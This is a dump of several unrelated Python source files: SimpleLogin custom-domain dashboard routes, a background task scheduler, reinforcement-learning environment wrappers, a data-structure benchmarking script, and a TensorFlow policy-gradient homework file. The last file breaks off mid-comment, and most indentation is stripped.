dmarc_ok = False
dmarc_errors = txt_records
return render_template(
"dashboard/domain_detail/dns.html",
EMAIL_SERVERS_WITH_PRIORITY=EMAIL_SERVERS_WITH_PRIORITY,
**locals(),
)
@dashboard_bp.route("/domains/<int:custom_domain_id>/info", methods=["GET", "POST"])
@login_required
def domain_detail(custom_domain_id):
custom_domain = CustomDomain.get(custom_domain_id)
if not custom_domain or custom_domain.user_id != current_user.id:
flash("You cannot see this page", "warning")
return redirect(url_for("dashboard.index"))
if request.method == "POST":
if request.form.get("form-name") == "switch-catch-all":
custom_domain.catch_all = not custom_domain.catch_all
db.session.commit()
if custom_domain.catch_all:
flash(
f"The catch-all has been enabled for {custom_domain.domain}",
"success",
)
else:
flash(
f"The catch-all has been disabled for {custom_domain.domain}",
"warning",
)
return redirect(
url_for("dashboard.domain_detail", custom_domain_id=custom_domain.id)
)
elif request.form.get("form-name") == "set-name":
custom_domain.name = request.form.get("alias-name").replace("\n", "")
db.session.commit()
flash(
f"Default alias name for Domain {custom_domain.domain} has been set",
"success",
)
return redirect(
url_for("dashboard.domain_detail", custom_domain_id=custom_domain.id)
)
elif request.form.get("form-name") == "switch-random-prefix-generation":
custom_domain.random_prefix_generation = (
not custom_domain.random_prefix_generation
)
db.session.commit()
if custom_domain.random_prefix_generation:
flash(
f"Random prefix generation has been enabled for {custom_domain.domain}",
"success",
)
else:
flash(
f"Random prefix generation has been disabled for {custom_domain.domain}",
"warning",
)
return redirect(
url_for("dashboard.domain_detail", custom_domain_id=custom_domain.id)
)
elif request.form.get("form-name") == "delete":
name = custom_domain.domain
LOG.d("Schedule deleting %s", custom_domain)
Thread(target=delete_domain, args=(custom_domain_id,)).start()
flash(
f"{name} scheduled for deletion."
f"You will receive a confirmation email when the deletion is finished",
"success",
)
return redirect(url_for("dashboard.custom_domain"))
nb_alias = Alias.filter_by(custom_domain_id=custom_domain.id).count()
return render_template("dashboard/domain_detail/info.html", **locals())
def delete_domain(custom_domain_id: int):
from server import create_light_app
with create_light_app().app_context():
custom_domain = CustomDomain.get(custom_domain_id)
if not custom_domain:
return
domain_name = custom_domain.domain
user = custom_domain.user
CustomDomain.delete(custom_domain.id)
db.session.commit()
LOG.d("Domain %s deleted", domain_name)
send_email(
user.email,
f"Your domain {domain_name} has been deleted",
f"""Domain {domain_name} along with its aliases are deleted successfully.
Regards,
SimpleLogin team.
""",
)
@dashboard_bp.route("/domains/<int:custom_domain_id>/trash", methods=["GET", "POST"])
@login_required
def domain_detail_trash(custom_domain_id):
custom_domain = CustomDomain.get(custom_domain_id)
if not custom_domain or custom_domain.user_id != current_user.id:
flash("You cannot see this page", "warning")
return redirect(url_for("dashboard.index"))
if request.method == "POST":
if request.form.get("form-name") == "empty-all":
DomainDeletedAlias.filter_by(domain_id=custom_domain.id).delete()
db.session.commit()
flash("All deleted aliases can now be re-created", "success")
return redirect(
url_for(
"dashboard.domain_detail_trash", custom_domain_id=custom_domain.id
)
)
elif request.form.get("form-name") == "remove-single":
deleted_alias_id = request.form.get("deleted-alias-id")
deleted_alias = DomainDeletedAlias.get(deleted_alias_id)
if not deleted_alias or deleted_alias.domain_id != custom_domain.id:
flash("Unknown error, refresh the page", "warning")
return redirect(
url_for(
"dashboard.domain_detail_trash",
custom_domain_id=custom_domain.id,
)
)
DomainDeletedAlias.delete(deleted_alias.id)
db.session.commit()
flash(
f"{deleted_alias.email} can now be re-created",
"success",
)
return redirect(
url_for(
"dashboard.domain_detail_trash", custom_domain_id=custom_domain.id
)
)
domain_deleted_aliases = DomainDeletedAlias.filter_by(
domain_id=custom_domain.id
).all()
return render_template(
"dashboard/domain_detail/trash.html",
domain_deleted_aliases=domain_deleted_aliases,
custom_domain=custom_domain,
)
|
periodic.py
|
# Copyright 2019 Iguazio
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from threading import Thread
from time import monotonic, sleep
from ..utils import logger
class Task:
    # @yaronha - Add initialization here
def __init__(self):
pass
def run(self):
# @yaronha - Add code here
pass
def _schedule(task: Task, delay_seconds):
while True:
start = monotonic()
try:
try:
task.run()
except Exception as err:
logger.exception('task error - %s', err)
except Exception:
pass
duration = monotonic() - start
sleep_time = max(delay_seconds - duration, 0)
sleep(sleep_time)
def schedule(task: Task, delay_seconds):
"""Run task.run every delay_seconds in a background thread"""
thr = Thread(target=_schedule, args=(task, delay_seconds), daemon=True)
thr.start()
return thr
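# Editor's note: illustrative sketch only (not part of the original module),
# showing a minimal Task subclass; the schedule() call is left commented out so
# importing this file does not start a thread.
class _ExamplePrintTask(Task):
    def run(self):
        print('tick')
# schedule(_ExamplePrintTask(), delay_seconds=30)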
|
wrappers.py
|
import atexit
import functools
import sys
import threading
import traceback
import gym
import numpy as np
from PIL import Image
import cv2
import pybullet
import pybullet_envs
class DeepMindControl:
def __init__(self, name, size=(64, 64), camera=None):
domain, task = name.split('_', 1)
if domain == 'cup': # Only domain with multiple words.
domain = 'ball_in_cup'
if isinstance(domain, str):
from dm_control import suite
self._env = suite.load(domain, task)
else:
assert task is None
self._env = domain()
self._size = size
if camera is None:
camera = dict(quadruped=2).get(domain, 0)
self._camera = camera
@property
def observation_space(self):
spaces = {}
for key, value in self._env.observation_spec().items():
spaces[key] = gym.spaces.Box(
-np.inf, np.inf, value.shape, dtype=np.float32)
spaces['image'] = gym.spaces.Box(
0, 255, self._size + (3,), dtype=np.uint8)
return gym.spaces.Dict(spaces)
@property
def action_space(self):
spec = self._env.action_spec()
return gym.spaces.Box(spec.minimum, spec.maximum, dtype=np.float32)
def step(self, action):
time_step = self._env.step(action)
obs = dict(time_step.observation)
obs['image'] = self.render()
reward = time_step.reward or 0
done = time_step.last()
info = {'discount': np.array(time_step.discount, np.float32)}
return obs, reward, done, info
def reset(self):
time_step = self._env.reset()
obs = dict(time_step.observation)
obs['image'] = self.render()
return obs
def render(self, *args, **kwargs):
if kwargs.get('mode', 'rgb_array') != 'rgb_array':
raise ValueError("Only render mode 'rgb_array' is supported.")
return self._env.physics.render(*self._size, camera_id=self._camera)
class Bullet:
def __init__(self, env_name):
self.env = gym.make(env_name)
self.action_space = self.env.action_space
self.observation_space = gym.spaces.Dict({"image": gym.spaces.Box(0, 255, (64, 64, 3), dtype=np.uint8)})
self.steps_ctn = 0
def step(self, action):
reward = 0
for _ in range(2):
_, r, done, info = self.env.step(action)
self.steps_ctn += 1
observation = self.env.render("rgb_array")
observation = cv2.resize(observation, (64, 64), interpolation=cv2.INTER_LINEAR)
reward += r
if self.steps_ctn >= 1000:
done = True
observation = {"image": observation}
return observation, reward, done, info
observation = {"image": observation}
return observation, reward, done, info
def reset(self):
_ = self.env.reset()
observation = self.env.render("rgb_array")
observation = cv2.resize(observation, (64, 64), interpolation=cv2.INTER_LINEAR)
observation = {"image": observation}
self.steps_ctn = 0
return observation
def render(self, mode='human'):
return self.env.render(mode)
class Atari:
LOCK = threading.Lock()
def __init__(
self, name, action_repeat=4, size=(84, 84), grayscale=True, noops=30,
life_done=False, sticky_actions=True):
import gym
version = 0 if sticky_actions else 4
name = ''.join(word.title() for word in name.split('_'))
with self.LOCK:
self._env = gym.make('{}NoFrameskip-v{}'.format(name, version))
self._action_repeat = action_repeat
self._size = size
self._grayscale = grayscale
self._noops = noops
self._life_done = life_done
self._lives = None
shape = self._env.observation_space.shape[:2] + (() if grayscale else (3,))
self._buffers = [np.empty(shape, dtype=np.uint8) for _ in range(2)]
self._random = np.random.RandomState(seed=None)
@property
def observation_space(self):
shape = self._size + (1 if self._grayscale else 3,)
space = gym.spaces.Box(low=0, high=255, shape=shape, dtype=np.uint8)
return gym.spaces.Dict({'image': space})
@property
def action_space(self):
return self._env.action_space
def close(self):
return self._env.close()
def reset(self):
with self.LOCK:
self._env.reset()
noops = self._random.randint(1, self._noops + 1)
for _ in range(noops):
done = self._env.step(0)[2]
if done:
with self.LOCK:
self._env.reset()
self._lives = self._env.ale.lives()
if self._grayscale:
self._env.ale.getScreenGrayscale(self._buffers[0])
else:
self._env.ale.getScreenRGB2(self._buffers[0])
self._buffers[1].fill(0)
return self._get_obs()
def step(self, action):
total_reward = 0.0
for step in range(self._action_repeat):
_, reward, done, info = self._env.step(action)
total_reward += reward
if self._life_done:
lives = self._env.ale.lives()
done = done or lives < self._lives
self._lives = lives
if done:
break
elif step >= self._action_repeat - 2:
index = step - (self._action_repeat - 2)
if self._grayscale:
self._env.ale.getScreenGrayscale(self._buffers[index])
else:
self._env.ale.getScreenRGB2(self._buffers[index])
obs = self._get_obs()
return obs, total_reward, done, info
def render(self, mode):
return self._env.render(mode)
def _get_obs(self):
if self._action_repeat > 1:
np.maximum(self._buffers[0], self._buffers[1], out=self._buffers[0])
image = np.array(Image.fromarray(self._buffers[0]).resize(
self._size, Image.BILINEAR))
image = np.clip(image, 0, 255).astype(np.uint8)
image = image[:, :, None] if self._grayscale else image
return {'image': image}
class Collect:
def __init__(self, env, callbacks=None, precision=32):
self._env = env
self._callbacks = callbacks or ()
self._precision = precision
self._episode = None
def __getattr__(self, name):
return getattr(self._env, name)
def step(self, action):
obs, reward, done, info = self._env.step(action)
obs = {k: self._convert(v) for k, v in obs.items()}
transition = obs.copy()
transition['action'] = action
transition['reward'] = reward
transition['discount'] = info.get('discount', np.array(1 - float(done)))
self._episode.append(transition)
if done:
episode = {k: [t[k] for t in self._episode] for k in self._episode[0]}
episode = {k: self._convert(v) for k, v in episode.items()}
info['episode'] = episode
for callback in self._callbacks:
callback(episode)
return obs, reward, done, info
def reset(self):
obs = self._env.reset()
transition = obs.copy()
transition['action'] = np.zeros(self._env.action_space.shape)
transition['reward'] = 0.0
transition['discount'] = 1.0
self._episode = [transition]
return obs
def _convert(self, value):
value = np.array(value)
if np.issubdtype(value.dtype, np.floating):
dtype = {16: np.float16, 32: np.float32, 64: np.float64}[self._precision]
elif np.issubdtype(value.dtype, np.signedinteger):
dtype = {16: np.int16, 32: np.int32, 64: np.int64}[self._precision]
elif np.issubdtype(value.dtype, np.uint8):
dtype = np.uint8
else:
raise NotImplementedError(value.dtype)
return value.astype(dtype)
class TimeLimit:
def __init__(self, env, duration):
self._env = env
self._duration = duration
self._step = None
def __getattr__(self, name):
return getattr(self._env, name)
def step(self, action):
assert self._step is not None, 'Must reset environment.'
obs, reward, done, info = self._env.step(action)
self._step += 1
if self._step >= self._duration:
done = True
if 'discount' not in info:
info['discount'] = np.array(1.0).astype(np.float32)
self._step = None
return obs, reward, done, info
def reset(self):
self._step = 0
return self._env.reset()
class ActionRepeat:
def __init__(self, env, amount):
self._env = env
self._amount = amount
def __getattr__(self, name):
return getattr(self._env, name)
def step(self, action):
done = False
total_reward = 0
current_step = 0
while current_step < self._amount and not done:
obs, reward, done, info = self._env.step(action)
total_reward += reward
current_step += 1
return obs, total_reward, done, info
class NormalizeActions:
def __init__(self, env):
self._env = env
self._mask = np.logical_and(
np.isfinite(env.action_space.low),
np.isfinite(env.action_space.high))
self._low = np.where(self._mask, env.action_space.low, -1)
self._high = np.where(self._mask, env.action_space.high, 1)
def __getattr__(self, name):
return getattr(self._env, name)
@property
def action_space(self):
low = np.where(self._mask, -np.ones_like(self._low), self._low)
high = np.where(self._mask, np.ones_like(self._low), self._high)
return gym.spaces.Box(low, high, dtype=np.float32)
def step(self, action):
original = (action + 1) / 2 * (self._high - self._low) + self._low
original = np.where(self._mask, original, action)
return self._env.step(original)
class ObsDict:
def __init__(self, env, key='obs'):
self._env = env
self._key = key
def __getattr__(self, name):
return getattr(self._env, name)
@property
def observation_space(self):
spaces = {self._key: self._env.observation_space}
return gym.spaces.Dict(spaces)
@property
def action_space(self):
return self._env.action_space
def step(self, action):
obs, reward, done, info = self._env.step(action)
obs = {self._key: np.array(obs)}
return obs, reward, done, info
def reset(self):
obs = self._env.reset()
obs = {self._key: np.array(obs)}
return obs
class OneHotAction:
def __init__(self, env):
assert isinstance(env.action_space, gym.spaces.Discrete)
self._env = env
def __getattr__(self, name):
return getattr(self._env, name)
@property
def action_space(self):
shape = (self._env.action_space.n,)
space = gym.spaces.Box(low=0, high=1, shape=shape, dtype=np.float32)
space.sample = self._sample_action
return space
def step(self, action):
index = np.argmax(action).astype(int)
reference = np.zeros_like(action)
reference[index] = 1
if not np.allclose(reference, action):
raise ValueError(f'Invalid one-hot action:\n{action}')
return self._env.step(index)
def reset(self):
return self._env.reset()
def _sample_action(self):
actions = self._env.action_space.n
index = self._random.randint(0, actions)
reference = np.zeros(actions, dtype=np.float32)
reference[index] = 1.0
return reference
class RewardObs:
def __init__(self, env):
self._env = env
def __getattr__(self, name):
return getattr(self._env, name)
@property
def observation_space(self):
spaces = self._env.observation_space.spaces
assert 'reward' not in spaces
spaces['reward'] = gym.spaces.Box(-np.inf, np.inf, dtype=np.float32)
return gym.spaces.Dict(spaces)
def step(self, action):
obs, reward, done, info = self._env.step(action)
obs['reward'] = reward
return obs, reward, done, info
def reset(self):
obs = self._env.reset()
obs['reward'] = 0.0
return obs
class Async:
_ACCESS = 1
_CALL = 2
_RESULT = 3
_EXCEPTION = 4
_CLOSE = 5
def __init__(self, ctor, strategy='process'):
self._strategy = strategy
if strategy == 'none':
self._env = ctor()
elif strategy == 'thread':
import multiprocessing.dummy as mp
elif strategy == 'process':
import multiprocessing as mp
else:
raise NotImplementedError(strategy)
if strategy != 'none':
self._conn, conn = mp.Pipe()
self._process = mp.Process(target=self._worker, args=(ctor, conn))
atexit.register(self.close)
self._process.start()
self._obs_space = None
self._action_space = None
@property
def observation_space(self):
if not self._obs_space:
self._obs_space = self.__getattr__('observation_space')
return self._obs_space
@property
def action_space(self):
if not self._action_space:
self._action_space = self.__getattr__('action_space')
return self._action_space
def __getattr__(self, name):
if self._strategy == 'none':
return getattr(self._env, name)
self._conn.send((self._ACCESS, name))
return self._receive()
def call(self, name, *args, **kwargs):
blocking = kwargs.pop('blocking', True)
if self._strategy == 'none':
return functools.partial(getattr(self._env, name), *args, **kwargs)
payload = name, args, kwargs
self._conn.send((self._CALL, payload))
promise = self._receive
return promise() if blocking else promise
def close(self):
if self._strategy == 'none':
try:
self._env.close()
except AttributeError:
pass
return
try:
self._conn.send((self._CLOSE, None))
self._conn.close()
except IOError:
# The connection was already closed.
pass
self._process.join()
def step(self, action, blocking=True):
return self.call('step', action, blocking=blocking)
def reset(self, blocking=True):
return self.call('reset', blocking=blocking)
def _receive(self):
try:
message, payload = self._conn.recv()
except ConnectionResetError:
raise RuntimeError('Environment worker crashed.')
# Re-raise exceptions in the main process.
if message == self._EXCEPTION:
stacktrace = payload
raise Exception(stacktrace)
if message == self._RESULT:
return payload
raise KeyError(f'Received message of unexpected type {message}')
def _worker(self, ctor, conn):
try:
env = ctor()
while True:
try:
# Only block for short times to have keyboard exceptions be raised.
if not conn.poll(0.1):
continue
message, payload = conn.recv()
except (EOFError, KeyboardInterrupt):
break
if message == self._ACCESS:
name = payload
result = getattr(env, name)
conn.send((self._RESULT, result))
continue
if message == self._CALL:
name, args, kwargs = payload
result = getattr(env, name)(*args, **kwargs)
conn.send((self._RESULT, result))
continue
if message == self._CLOSE:
assert payload is None
break
raise KeyError(f'Received message of unknown type {message}')
except Exception:
stacktrace = ''.join(traceback.format_exception(*sys.exc_info()))
print(f'Error in environment process: {stacktrace}')
conn.send((self._EXCEPTION, stacktrace))
conn.close()
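# Editor's note: illustrative sketch only (not part of the original module),
# showing one common way to compose the wrappers above; the task name and
# limits are assumptions.
def _example_make_env():
    env = DeepMindControl('walker_walk', size=(64, 64))
    env = ActionRepeat(env, 2)
    env = NormalizeActions(env)
    env = TimeLimit(env, duration=1000 // 2)  # 1000 inner steps at action repeat 2
    env = RewardObs(env)
    return env
# To run it in a separate process: env = Async(_example_make_env, strategy='process')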
|
benchmarkingv2.py
|
from datastructures import structures
import random, time, gc, threading
import traceback
import pathlib, sys
import platform
import numpy as np
MININT = -2147483648
MAXINT = 2147483647
def init_structure(name, preload = []):
kls = "datastructures.{0}.{0}".format(name)
parts = kls.split('.')
module = ".".join(parts[:-1])
m = __import__( module )
for comp in parts[1:]:
m = getattr(m, comp)
m.__init__(m, preload)
return m
def time_execution_thread(instance, func, values):
res = None
    thread_return = {'time': 0.0}
def compute(thread_return):
try:
start = time.time()
for i in values:
func(instance, i) # We might have to do something with this value to avoid optimizations
end = time.time()
thread_return['time'] = end - start
except Exception:
print(f"{i} {instance.size(instance)}")
exit(0)
p = threading.Thread(target=compute, args=(thread_return,))
p.start()
# Wait for 10 seconds or until process finishes
p.join(10)
if p.is_alive():
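        # Editor's note: the worker thread cannot be forcibly stopped, so after
        # the 10 s join times out it keeps running in the background.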
raise TimeoutError # We ran out of time
else:
return thread_return['time']
def time_execution(instance, func, values):
start = time.time()
for i in values:
func(instance, i) # We might have to do something with this value to avoid optimizations
end = time.time()
return end - start
N = 8
def run_benchmark(filename):
pathlib.Path('../results/timings/').mkdir(parents=True, exist_ok=True)
with open(f"../results/timings/{filename}.csv", "w") as f:
def write_csv_results(ds, n, op, num_ops, time_taken):
f.write(f"{ds},{n},{op},{num_ops},{time_taken}\n")
write_csv_results("DS", "Size", "Op", "OpCount", "Time(s)")
### DESTRUCTIVE METHODS #####################################
# We don't have a good way of measuring these under small n
# So results which ran faster than a threshold will get discarded
# As the measurement error will be too large.
l_preload_values = random.sample(range(MININT, MAXINT // 2), 10**N) # Limit the range so we can use it for adds without duplicates
for n in range(4, N):
preload_values = l_preload_values[:10**n]
deletes = 10**n - 1 if 10**n < 1000000 else 1000000 // n
delete_values = [random.randint(0, (len(preload_values) - i)) for i in range(1, deletes)] #Potentially move these into functions so they can be garbage cleaned and save ram. Might be a bit much right now
for ds in structures:
instance = init_structure(ds, preload_values)
try:
time_taken = time_execution(instance, instance.delete, delete_values)
except AssertionError as e:
print(f"{ds} Had an AssertionError doing deletion.")
continue
except TimeoutError as e:
print(f"{ds} was too slow and was skipped!")
continue
except Exception as e:
print(f"{ds} Had an exception doing deletion:\n{e}")
traceback.print_exc()
continue
print(f"{ds} took {time_taken}s for deleting {deletes} values")
write_csv_results(ds, 10**n, "Delete", deletes, time_taken)
del delete_values
f.flush()
for n in range(4, N):
for ds in structures:
preload_values = l_preload_values[:10**n]
instance = init_structure(ds, preload_values)
removes = 10**n if 10**n < 100000 else 1000000 // n
try:
time_taken = time_execution(instance, instance.remove, preload_values[:removes-1])
except AssertionError as e:
print(f"{ds} Had an AssertionError doing removal.")
continue
except TimeoutError as e:
print(f"{ds} was too slow and was skipped!")
continue
except Exception as e:
print(f"{ds} Had an exception doing removal:\n{e}")
traceback.print_exc()
continue
print(f"{ds} took {time_taken}s for removing {removes} values")
write_csv_results(ds, 10**n, "Remove", removes, time_taken)
f.flush()
for n in range(4, N):
preload_values = l_preload_values[:10**n]
adds = 10**n if 10**n < 100000 else 1000000 // n
add_values = [random.randint(MAXINT // 2 + 1, MAXINT) for i in range(adds)]
for ds in structures:
instance = init_structure(ds, preload_values)
try:
time_taken = time_execution(instance, instance.add, add_values)
except TimeoutError as e:
print(f"{ds} was too slow and was skipped!")
continue
print(f"{ds} took {time_taken}s for adding {adds} value")
write_csv_results(ds, 10**n, "Add", adds, time_taken)
del add_values
f.flush()
### NON-DESTRUCTIVE ####
# These methods should not modify the data structure
# and can therefore be called until they took at least 1 second to run.
for n in range(4, N):
preload_values = l_preload_values[:10**n]
if "PyPy" in platform.python_implementation(): #4 million is not enough for pypy
select_values = [np.random.randint(0, len(preload_values)) for i in range(4194304 * 6)]
else:
select_values = [np.random.randint(0, len(preload_values)) for i in range(4194304)]# 4 million should be enough
for ds in structures:
selects = 64
instance = init_structure(ds, preload_values)
time_taken = 0
try:
while time_taken < 1:
time_taken = time_execution(instance, instance.select, select_values[:selects])
if time_taken < 1:
selects *= 2
except TimeoutError as e:
print(f"{ds} was too slow and was skipped!")
continue
print(f"{ds} took {time_taken}s for selecting {selects} value")
write_csv_results(ds, 10**n, "Select", selects, time_taken)
del select_values
f.flush()
# 4 million should be enough
for n in range(4, N):
preload_values = l_preload_values[:10**n]
rank_values = [preload_values[random.randint(0, len(preload_values) - 1)] for i in range(4194304)]
for ds in structures:
ranks = 64
instance = init_structure(ds, preload_values)
time_taken = 0
try:
while time_taken < 1:
time_taken = time_execution(instance, instance.rank, rank_values[:ranks])
if time_taken < 1:
ranks *= 2
except TimeoutError as e:
print(f"{ds} was too slow and was skipped!")
continue
print(f"{ds} took {time_taken}s for ranking {ranks} value")
write_csv_results(ds, 10**n, "Rank", ranks, time_taken)
del rank_values
f.flush()
l_preload_values.sort() # Just makes it easier from after this
for n in range(4, N):
preload_values = l_preload_values[:10**n]
successor_values = [preload_values[random.randint(1, len(preload_values) - 2)] for i in range(4194304)] # 4 million should be enough
for ds in structures:
successors = 64
instance = init_structure(ds, preload_values)
time_taken = 0
try:
while time_taken < 1:
time_taken = time_execution(instance, instance.successor, successor_values[:successors])
if time_taken < 1:
successors *= 2
except TimeoutError as e:
print(f"{ds} was too slow and was skipped!")
continue
print(f"{ds} took {time_taken}s for successor {successors} value")
write_csv_results(ds, 10**n, "Successor", successors, time_taken)
f.flush()
# We can just reuse the choices from before
for n in range(4, N):
preload_values = l_preload_values[:10**n]
predecessor_values = [preload_values[random.randint(1, len(preload_values) - 2)] for i in range(4194304)] # 4 million should be enough
for ds in structures:
predessors = 64
instance = init_structure(ds, preload_values)
time_taken = 0
try:
while time_taken < 1:
time_taken = time_execution(instance, instance.predecessor, predecessor_values[:predessors])
if time_taken < 1:
predessors *= 2
except TimeoutError as e:
print(f"{ds} was too slow and was skipped!")
continue
print(f"{ds} took {time_taken}s for predecessor {predessors} value")
write_csv_results(ds, 10**n, "Predecessor", predessors, time_taken)
del predecessor_values
f.flush()
gc.collect()
if __name__ == "__main__":
print(f"Testing structures: {structures}")
run_benchmark(sys.argv[1])
|
train_pg.py
|
import inspect
import math
import os
import time
from multiprocessing import Process
from typing import List
import gym
import numpy as np
import scipy.signal
import tensorflow as tf
import logz
# ============================================================================================#
# Utilities
# ============================================================================================#
def build_mlp(
input_placeholder,
output_size,
scope,
n_layers=2,
size=64,
activation=tf.tanh,
output_activation=None
):
# ========================================================================================#
# ----------SECTION 3----------
# Network building
#
# Your code should make a feedforward neural network (also called a multilayer perceptron)
# with 'n_layers' hidden layers of size 'size' units.
#
# The output layer should have size 'output_size' and activation 'output_activation'.
#
# Hint: use tf.layers.dense
# ========================================================================================#
with tf.variable_scope(scope):
l_hid = tf.layers.dense(inputs=input_placeholder, units=size, activation=activation)
        for _ in range(1, n_layers):  # add the remaining (n_layers - 1) hidden layers
l_hid = tf.layers.dense(inputs=l_hid, units=size, activation=activation)
l_output = tf.layers.dense(inputs=l_hid, units=output_size, activation=output_activation)
# YOUR_CODE_HERE
return l_output
def pathlength(path):
return len(path["reward"])
# ============================================================================================#
# Policy Gradient
# ============================================================================================#
def train_PG(exp_name='',
env_name='CartPole-v0',
n_iter=100,
gamma=1.0,
min_timesteps_per_batch=1000,
max_path_length=None,
learning_rate=5e-3,
reward_to_go=True,
animate=True,
logdir=None,
normalize_advantages=True,
nn_baseline=False,
seed=0,
# network arguments
n_layers=1,
size=32
):
start = time.time()
# Configure output directory for logging
logz.configure_output_dir(logdir)
# Log experimental parameters
args = inspect.getargspec(train_PG)[0]
locals_ = locals()
params = {k: locals_[k] if k in locals_ else None for k in args}
logz.save_params(params)
# Set random seeds
tf.set_random_seed(seed)
np.random.seed(seed)
# Make the gym environment
env = gym.make(env_name)
# Is this env continuous, or discrete?
discrete = isinstance(env.action_space, gym.spaces.Discrete)
# Maximum length for episodes
max_path_length = max_path_length or env.spec.max_episode_steps
# ========================================================================================#
# Notes on notation:
#
# Symbolic variables have the prefix sy_, to distinguish them from the numerical values
# that are computed later in the function
#
# Prefixes and suffixes:
# ob - observation
# ac - action
# _no - this tensor should have shape (batch size /n/, observation dim)
# _na - this tensor should have shape (batch size /n/, action dim)
# _n - this tensor should have shape (batch size /n/)
#
# Note: batch size /n/ is defined at runtime, and until then, the shape for that axis
# is None
# ========================================================================================#
# Observation and action sizes
ob_dim = env.observation_space.shape[0]
ac_dim = env.action_space.n if discrete else env.action_space.shape[0]
# ========================================================================================#
# ----------SECTION 4----------
# Placeholders
#
# Need these for batch observations / actions / advantages in policy gradient loss function.
# ========================================================================================#
sy_ob_no = tf.placeholder(shape=[None, ob_dim], name="ob", dtype=tf.float32)
if discrete:
sy_ac_na = tf.placeholder(shape=[None], name="ac", dtype=tf.int32)
else:
sy_ac_na = tf.placeholder(shape=[None, ac_dim], name="ac", dtype=tf.float32)
# Define a placeholder for advantages
sy_adv_n = tf.placeholder(shape=[None], name="adv", dtype=tf.float32)
# ========================================================================================#
# ----------SECTION 4----------
# Networks
#
# Make symbolic operations for
# 1. Policy network outputs which describe the policy distribution.
# a. For the discrete case, just logits for each action.
#
# b. For the continuous case, the mean / log std of a Gaussian distribution over
# actions.
#
# Hint: use the 'build_mlp' function you defined in utilities.
#
# Note: these ops should be functions of the placeholder 'sy_ob_no'
#
# 2. Producing samples stochastically from the policy distribution.
# a. For the discrete case, an op that takes in logits and produces actions.
#
# Should have shape [None]
#
# b. For the continuous case, use the reparameterization trick:
# The output from a Gaussian distribution with mean 'mu' and std 'sigma' is
#
# mu + sigma * z, z ~ N(0, I)
#
# This reduces the problem to just sampling z. (Hint: use tf.random_normal!)
#
# Should have shape [None, ac_dim]
#
# Note: these ops should be functions of the policy network output ops.
#
# 3. Computing the log probability of a set of actions that were actually taken,
# according to the policy.
#
# Note: these ops should be functions of the placeholder 'sy_ac_na', and the
# policy network output ops.
#
# ========================================================================================#
if discrete:
# YOUR_CODE_HERE
sy_logits_na = build_mlp(sy_ob_no, size=size, output_size=ac_dim, scope='policy', n_layers=n_layers)
sy_sampled_ac = tf.reshape(tf.multinomial(sy_logits_na, 1), [-1]) # Hint: Use the tf.multinomial op
sy_logprob_n = tf.nn.softmax_cross_entropy_with_logits(logits=sy_logits_na,
labels=tf.one_hot(sy_ac_na, depth=ac_dim))
else:
# YOUR_CODE_HERE
sy_mean = build_mlp(sy_ob_no, size=size, output_size=ac_dim, scope='policy', n_layers=n_layers)
sy_logstd = tf.get_variable(name='logstd', shape=[ac_dim], dtype=tf.float32, initializer=tf.initializers.ones,
trainable=True) # logstd should just be a trainable variable, not a network output.
sy_sampled_ac = sy_mean + tf.exp(sy_logstd) * tf.random_normal(tf.shape(sy_mean))  # reparameterization trick; tf.random_normal needs a concrete/dynamic shape, not None
c_log_2pi = math.log(math.pi * 2.0)
# Hint: Use the log probability under a multivariate gaussian.
# Negative log-likelihood of the diagonal Gaussian, summed over action dimensions so the result
# has shape [None] and matches the sign convention of the cross-entropy used in the discrete branch.
sy_logprob_n = tf.reduce_sum(
0.5 * tf.square((sy_ac_na - sy_mean) / tf.exp(sy_logstd)) + 0.5 * c_log_2pi + sy_logstd,
axis=1)
# ========================================================================================#
# ----------SECTION 4----------
# Loss Function and Training Operation
# ========================================================================================#
# Surrogate loss whose gradient is the policy gradient: sy_logprob_n holds negative log-probabilities,
# so minimizing this maximizes E[log pi(a|s) * advantage].
loss = tf.reduce_mean(sy_logprob_n * sy_adv_n)
update_op = tf.train.AdamOptimizer(learning_rate).minimize(loss)
# ========================================================================================#
# ----------SECTION 5----------
# Optional Baseline
# ========================================================================================#
if nn_baseline:
baseline_prediction = tf.squeeze(build_mlp(
sy_ob_no,
1,
"nn_baseline",
n_layers=n_layers,
size=size))
# Define placeholders for targets, a loss function and an update op for fitting a
# neural network baseline. These will be used to fit the neural network baseline.
# YOUR_CODE_HERE
baseline_loss = tf.losses.mean_squared_error(sy_adv_n, baseline_prediction)
baseline_update_op = tf.train.AdamOptimizer(learning_rate).minimize(baseline_loss)
# ========================================================================================#
# Tensorflow Engineering: Config, Session, Variable initialization
# ========================================================================================#
tf_config = tf.ConfigProto(inter_op_parallelism_threads=1, intra_op_parallelism_threads=1)
sess = tf.Session(config=tf_config)
sess.__enter__() # equivalent to `with sess:`
tf.global_variables_initializer().run() # pylint: disable=E1101
# ========================================================================================#
# Training Loop
# ========================================================================================#
total_timesteps = 0
for itr in range(n_iter):
print("********** Iteration %i ************" % itr)
# Collect paths until we have enough timesteps
timesteps_this_batch = 0
paths = []
while True:
ob = env.reset()
obs, acs, rewards = [], [], []
animate_this_episode = (len(paths) == 0 and (itr % 10 == 0) and animate)
steps = 0
while True:
if animate_this_episode:
env.render()
time.sleep(0.05)
obs.append(ob)
ac = sess.run(sy_sampled_ac, feed_dict={sy_ob_no: ob[None]})
ac = ac[0]
acs.append(ac)
ob, rew, done, _ = env.step(ac)
rewards.append(rew)
steps += 1
if done or steps > max_path_length:
break
path = {"observation": np.array(obs),
"reward": np.array(rewards),
"action": np.array(acs)}
paths.append(path)
timesteps_this_batch += pathlength(path)
if timesteps_this_batch > min_timesteps_per_batch:
break
total_timesteps += timesteps_this_batch
# Build arrays for observation, action for the policy gradient update by concatenating
# across paths
ob_no = np.concatenate([path["observation"] for path in paths])
ac_na = np.concatenate([path["action"] for path in paths])
# ====================================================================================#
# ----------SECTION 4----------
# Computing Q-values
#
# Your code should construct numpy arrays for Q-values which will be used to compute
# advantages (which will in turn be fed to the placeholder you defined above).
#
# Recall that the expression for the policy gradient PG is
#
# PG = E_{tau} [sum_{t=0}^T grad log pi(a_t|s_t) * (Q_t - b_t )]
#
# where
#
# tau=(s_0, a_0, ...) is a trajectory,
# Q_t is the Q-value at time t, Q^{pi}(s_t, a_t),
# and b_t is a baseline which may depend on s_t.
#
